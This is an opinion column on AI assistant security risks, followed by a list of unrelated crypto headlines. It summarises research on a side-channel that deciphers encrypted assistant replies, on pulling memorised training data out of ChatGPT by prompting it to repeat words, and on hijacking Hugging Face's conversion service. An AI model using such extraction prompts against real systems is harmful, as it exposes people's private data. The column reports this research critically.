Fun

OpenAI set off an arms race and our security is the casualty

News Feed - 2024-04-11 05:04:34

Dr. Merav Ozair3 hours agoOpenAI set off an arms race and our security is the casualtyRecent research found that ChatGPT, as well as Google"s Gemini and Microsoft"s Copilot are rife with security vulnerabilities — so say goodbye to your data.195 Total views21 Total sharesListen to article 0:00OpinionOwn this piece of crypto historyCollect this article as NFTJoin us on social networksSince ChatGPT launched in late 2022 and made artificial intelligence (AI) mainstream, everyone has been trying to ride the AI wave — tech and non-tech companies, incumbents and start-ups — flooding the market with all sorts of AI assistants and trying to get our attention with the next “flashy” application or upgrade. 


With the promise from tech leaders that AI will do everything and be everything for us, AI assistants have become our business and marriage consultants, our advisors, therapists, companions, confidants — listening as we share our business or personal information and other private secrets and thoughts.


The providers of these AI-powered services are aware of the sensitivity of these discussions and assure us that they are taking active measures to protect our information from being exposed. Are we really being protected?AI assistants — friend or foe?


Research published in March by researchers at the University of Ber-Gurion showed that our secrets can be exposed. The researchers devised an attack that deciphers AI assistant responses with surprising accuracy, despite their encryption. The technique exploits a vulnerability in the system design of all major platforms, including Microsoft’s Copilot and OpenAI’s ChatGPT-4, except for Google’s Gemini.


Related: Trading Bitcoin’s halving: 3 traders share their thoughts


Furthermore, the researchers showed that once the attacker built a tool to decipher a conversation — for example, with ChatGPT — this tool could work on other services as well, and thus could be shared (like other hacking tools) and used across the board with no additional effort.


This is not the first research pointing to security flaws in the design and development of AI assistants. Other studies have been floating around for quite a while. In late 2023, researchers from several U.S. universities and Google DeepMind described how they could get ChatGPT to spew out memorized portions of its training data merely by prompting it to repeat certain words.


The researchers were able to extract from ChatGPT verbatim paragraphs from books and poems, URLs, unique user identifier, Bitcoin (BTC) addresses, programming codes and more.


Adversaries could intentionally use crafted prompts or inputs to delude the bots to generate the training data, which may include sensitive personal and professional information.


The security problems are even more acute with open-source models. A recent study showed how an attacker could compromise Hugging Face conversion service and hijack any model that submitted through the conversion service. The implications of such an attack are significant. The adversary could implant their own model instead, push malicious models to repositories or access private repositories datasets.


To put things in perspective, the researchers found that organizations such as Microsoft and Google — which combined have 905 models hosted on Hugging Face — that received changes through the conversion service, and might have been at risk of an attack and compromised.Things can worsen


AI’s new capabilities may be alluring, but the more power one gives to AI assistants, the more vulnerable one is to an attack.


Bill Gates, writing in a blog last year, described how an overarching AI assistant (what he termed an “agent”) will have access to all our devices — personal and professional — to integrate and analyze the combined information to act as our “personal assistant.”


As Gates wrote in the blog:An agent will be able to help you with all your activities if you want it to. With permission to follow your online interactions and real-world locations, it will develop a powerful understanding of the people, places, and activities you engage in. It will get your personal and work relationships, hobbies, preferences, and schedule. You’ll choose how and when it steps in to help with something or ask you to make a decision.


This is not science fiction, and it could happen sooner than we think. Project 01, an open-source ecosystem for AI devices, recently launched an AI assistant called 01 Light. "The 01 Light is a portable voice interface that controls your home computer," the company wrote on X. "It can see your screen, use your apps, and learn new skills.”Project 01 described on X how its 01 Light assistant works. Source: X


It might be quite exciting to have such a personal AI assistant. However, if the security issues are not promptly addressed, and developers are meticulously making sure that the system and code are “clean” from all possible vulnerabilities, there is a possibility that if this agent is adversely attacked, your entire life could be hijacked — including information of any person or organization that is related to you.Can we protect ourselves?


In late March, the U.S. House of Representatives set a strict ban on congressional staffers" use of Microsoft"s Copilot.


"The Microsoft Copilot application has been deemed by the Office of Cybersecurity to be a risk to users due to the threat of leaking House data to non-House approved cloud services," House Chief Administrative Officer Catherine Szpindor said in a statement announcing the move.


In early April, the Cyber Safety Review Board (CSRB) — which falls under the Department of Homeland Security — published a report blaming Microsoft for a "cascade of security failures" that enabled Chinese threat actors to access U.S. government officials’ emails in summer 2023. The incident was preventable and should never have happened.


Related: Bad blockchain forensics convict the user of a Bitcoin mixer — as its operator


As the report stated: "Microsoft has an inadequate security culture and requires an overhaul." This would most likely include security issues with Copilot.


This is not the first ban on an AI assistant. Technology companies such as Apple, Amazon, Samsung and Spotify along with financial institutions including JPMorgan Chase, Citi, Goldman Sachs and others have banned the use of AI bots for their employees.


Major technology companies including OpenAI and Microsoft pledged last year to adhere to responsible AI. Since then, no substantial actions have been taken.


Pledging is not enough. Regulators and policy makers should demand actions. In the meantime, we should refrain from sharing any sensitive personal or business information.


And maybe if we — collectively— stop using these bots until substantial actions have been taken to protect us, we might have a chance to be "heard" and force companies and developers to implement the needed security measures.Dr. Merav Ozair is a guest author for Cointelegraph and is developing and teaching emerging technologies courses at Wake Forest University and Cornell University. She was previously a FinTech professor at Rutgers Business School, where she taught courses on Web3 and related emerging technologies. She is a member of the academic advisory board at the International Association for Trusted Blockchain Applications (INATBA) and serves on the advisory board of EQM Indexes — Blockchain Index Committee. She is the founder of Emerging Technologies Mastery, a Web3 and AI end-to-end consultancy shop, and holds a PhD from Stern Business School at NYU.


This article is for general information purposes and is not intended to be and should not be taken as legal or investment advice. The views, thoughts, and opinions expressed here are the author’s alone and do not necessarily reflect or represent the views and opinions of Cointelegraph.# Google# Technology# Tech# Microsoft# AI# Tech Analysis# Opinion# ChatGPT# OpenAIAdd reaction

News Feed

OVR and BlackPool: NFTs With Augmented Reality and Virtual Reality
OVR and BlackPool: NFTs With Augmented Reality and Virtual Reality sponsored OVRis collaborating with BlackPool to add augmented reality (AR) and virtual reality
Samsung SDS Pilots Blockchain-Based Medical Insurance Network
Samsung SDS, an IT solution developer partially owned by the South Korean tech conglomerate, is expecting to roll out a blockchain-based medical claims processing system this month.
Jesse Coghlan14 minutes agoBlockchain.com scores payment license from Singapore central bankThe crypto exchange is the 12th to receive a crypto-dealing license in the country allowing it to service accredited investors a
Market Shockwave Ahead? Ethereum Could Crash Over 60%, Analyst Says
Este artículo también está disponible en español. Like most digital assets, Ethereum witnessed a correction this week by losing over 5% in the last 24 hours while trading
Uquid Launch the Defi Shopping Stake (DSS) and Defito Finance (DTO)
Uquid Launch the Defi Shopping Stake (DSS) and Defito Finance (DTO)The trouble with many current DeFi projects is that while they eliminate traditional institutions from the mix, th
Microsoft investors’ fears escalate over AI’s slow payoff
Savannah Fortis1 hour agoMicrosoft investors’ fears escalate over AI’s slow payoffMicrosoft investors are increasingly anxious about the slow financial returns from its significant investments in artificial intellige
Kevin O’Leary, Bill Ackman Slammed for Defending Sam Bankman-Fried — ‘I Think SBF Is Telling the Truth’
Kevin O"Leary, Bill Ackman Slammed for Defending Sam Bankman-Fried — "I Think SBF Is Telling the Truth" Shark Tank star Kevin O’Leary and billionaire hedge fund manager Bil
UK crypto advocates call for consistent policy after Labour landslide
Turner Wright7 hours agoUK crypto advocates call for consistent policy after Labour landslideAt least one industry leader suggested that crypto policy in the United Kingdom would be “business as usual” despite the ch
DeFi hub Chainage seeks tokenholder approval for $13M capital raise
Zhiyuan Sun6 hours agoDeFi hub Chainage seeks tokenholder approval for $13M capital raise“Pending DAO approval, we will advance with the particulars of the investment and detail the precise arrangements and plans,” t
Russian Founders of Defi Platform Forsage Indicted in $340 Million Crypto Ponzi Scheme
Russian Founders of Defi Platform Forsage Indicted in $340 Million Crypto Ponzi Scheme Four Russians have been charged in the U.S. with operating a crypto pyramid and Ponzi scheme
Coinbase narrows subpoena, wants Gensler’s emails during time as SEC Chair
Brayden Lindrea15 minutes agoCoinbase narrows subpoena, wants Gensler’s emails during time as SEC ChairCoinbase initially demanded a subpoena into Gary Gensler’s private communications before his time as SEC Chair bu
William Suberg7 hours agoBitcoin traders’ BTC price dip targets now include $30.9K bottomBitcoin is giving many traders a feeling that a support retest could be next, but BTC price strength is winning out over altcoins